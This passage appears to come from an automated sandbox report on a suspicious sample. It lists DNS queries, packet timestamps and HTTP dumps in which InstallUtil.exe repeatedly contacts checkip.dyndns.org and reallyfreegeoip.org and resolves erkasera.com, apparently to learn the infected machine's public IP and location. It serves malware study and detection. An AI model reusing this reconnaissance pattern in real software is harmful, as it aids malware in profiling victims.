                                                      Oct 30, 2024 07:58:01.853003025 CET49792443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:01.853029013 CET44349792188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:01.996810913 CET44349792188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:01.996911049 CET44349792188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:01.997052908 CET49792443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:01.998157024 CET49792443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:02.001339912 CET4979080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:02.002322912 CET4979880192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:02.007390022 CET8049790193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:02.007802010 CET8049798193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:02.007900000 CET4979080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:02.007936954 CET4979880192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:02.008085012 CET4979880192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:02.013627052 CET8049798193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:02.867974997 CET8049798193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:02.873008013 CET49804443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:02.873045921 CET44349804188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:02.873112917 CET49804443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:02.885426998 CET49804443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:02.885442972 CET44349804188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:02.919181108 CET4979880192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:03.506797075 CET44349804188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:03.508569002 CET49804443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:03.508608103 CET44349804188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:03.651460886 CET44349804188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:03.651551962 CET44349804188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:03.651626110 CET49804443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:03.652051926 CET49804443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:03.655304909 CET4979880192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:03.656408072 CET4981080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:03.661482096 CET8049798193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:03.661559105 CET4979880192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:03.661732912 CET8049810193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:03.661798000 CET4981080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:03.662055016 CET4981080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:03.667316914 CET8049810193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:04.333045006 CET8049810193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:04.334527969 CET49816443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:04.334563971 CET44349816188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:04.334634066 CET49816443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:04.334897995 CET49816443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:04.334914923 CET44349816188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:04.387973070 CET4981080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:04.967859030 CET44349816188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:04.969515085 CET49816443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:04.969533920 CET44349816188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:05.122051001 CET44349816188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:05.122137070 CET44349816188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:05.122680902 CET49816443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:05.122996092 CET49816443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:05.126096964 CET4981080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:05.127248049 CET4982180192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:05.133179903 CET8049810193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:05.133291006 CET4981080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:05.133601904 CET8049821193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:05.133678913 CET4982180192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:05.133903027 CET4982180192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:05.139265060 CET8049821193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:05.967027903 CET8049821193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:05.968333006 CET49825443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:05.968400002 CET44349825188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:05.968471050 CET49825443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:05.968764067 CET49825443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:05.968791962 CET44349825188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:06.012959957 CET4982180192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:07.130110979 CET44349825188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:07.131869078 CET49825443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:07.131884098 CET44349825188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:07.283937931 CET44349825188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:07.284009933 CET44349825188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:58:07.284065962 CET49825443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:07.284538031 CET49825443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:58:44.893188953 CET8049708193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:44.893271923 CET4970880192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:58:52.553992033 CET8049718193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:52.554605007 CET8049718193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:58:52.554694891 CET4971880192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:59:03.348135948 CET8049767193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:59:03.348221064 CET4976780192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:59:11.000571966 CET8049821193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:59:11.002520084 CET4982180192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:59:27.123658895 CET4971880192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:59:27.129247904 CET8049718193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:59:46.063976049 CET4982180192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:59:46.100756884 CET8049821193.122.130.0192.168.2.5

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 30, 2024 07:57:30.790379047 CET5948253192.168.2.51.1.1.1
                                                      Oct 30, 2024 07:57:30.940396070 CET53594821.1.1.1192.168.2.5
                                                      Oct 30, 2024 07:57:36.420012951 CET4946653192.168.2.51.1.1.1
                                                      Oct 30, 2024 07:57:36.427736044 CET53494661.1.1.1192.168.2.5
                                                      Oct 30, 2024 07:57:37.343424082 CET6383853192.168.2.51.1.1.1
                                                      Oct 30, 2024 07:57:37.351681948 CET53638381.1.1.1192.168.2.5

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 30, 2024 07:57:30.790379047 CET192.168.2.51.1.1.10xb7eeStandard query (0)erkasera.comA (IP address)IN (0x0001)false
                                                      Oct 30, 2024 07:57:36.420012951 CET192.168.2.51.1.1.10x50acStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                      Oct 30, 2024 07:57:37.343424082 CET192.168.2.51.1.1.10xb5ecStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 30, 2024 07:57:30.940396070 CET1.1.1.1192.168.2.50xb7eeNo error (0)erkasera.com188.132.193.46A (IP address)IN (0x0001)false
                                                      Oct 30, 2024 07:57:36.427736044 CET1.1.1.1192.168.2.50x50acNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                      Oct 30, 2024 07:57:36.427736044 CET1.1.1.1192.168.2.50x50acNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                      Oct 30, 2024 07:57:36.427736044 CET1.1.1.1192.168.2.50x50acNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                      Oct 30, 2024 07:57:36.427736044 CET1.1.1.1192.168.2.50x50acNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                      Oct 30, 2024 07:57:36.427736044 CET1.1.1.1192.168.2.50x50acNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                      Oct 30, 2024 07:57:36.427736044 CET1.1.1.1192.168.2.50x50acNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                      Oct 30, 2024 07:57:37.351681948 CET1.1.1.1192.168.2.50xb5ecNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                      Oct 30, 2024 07:57:37.351681948 CET1.1.1.1192.168.2.50xb5ecNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • erkasera.com
                                                      • reallyfreegeoip.org
                                                      • checkip.dyndns.org

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549705193.122.130.0802460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:57:36.441065073 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:37.132054090 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:37 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 12ada612d30ee11d429f11b0f23e7967
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                      Oct 30, 2024 07:57:37.135967016 CET127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Oct 30, 2024 07:57:37.304203033 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:37 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: f7eabcb33802362db5d7f08c031aabc3
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                      Oct 30, 2024 07:57:38.255918980 CET127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Oct 30, 2024 07:57:38.419322968 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:38 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: ac3e9601a3475daeb18a99198bf1ba9a
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.549708193.122.130.0802460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:57:39.198014975 CET127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Oct 30, 2024 07:57:39.859971046 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:39 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 3a67b4b598eb8ff1a70dd23e5c423a28
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.549710193.122.130.0802460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:57:40.633461952 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:41.311827898 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:41 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: c01f8f97864759eaf1a777cc0482af5f
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.549712193.122.130.0802460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:57:42.065803051 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:42.744299889 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:42 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 57835a0b2762f8e0b319eca8f94178d1
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.549714193.122.130.0802460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:57:43.552392006 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:44.222043037 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:44 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: c534f24b8027ad7773d374ca0201a444
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.549716193.122.130.0802460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:57:44.996670961 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:45.688980103 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:45 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 9c4416c1fca664739896e6125eb641c9
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.549718193.122.130.0802460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:57:46.444052935 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:47.105513096 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:47 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 18a587a7daa4548f3d8a2e52cc12ca17
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.549750193.122.130.0806204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:57:54.852499962 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:55.525356054 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: c4b74c4d7321730c96ac75dad22f0a41
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                      Oct 30, 2024 07:57:55.529294968 CET127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Oct 30, 2024 07:57:55.703931093 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: aea3030141df3963debc4b9d42b36215
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                      Oct 30, 2024 07:57:55.925192118 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: aea3030141df3963debc4b9d42b36215
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                      Oct 30, 2024 07:57:56.739945889 CET127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Oct 30, 2024 07:57:56.899477959 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 0178490672a9e8bfcbd368b45cbc4f28
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.549767193.122.130.0806204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:57:57.652051926 CET127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Oct 30, 2024 07:57:58.314532995 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:58 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 338b99e9a714468e4bd0705d1c79be16
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.549779193.122.130.0806204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:57:59.117760897 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
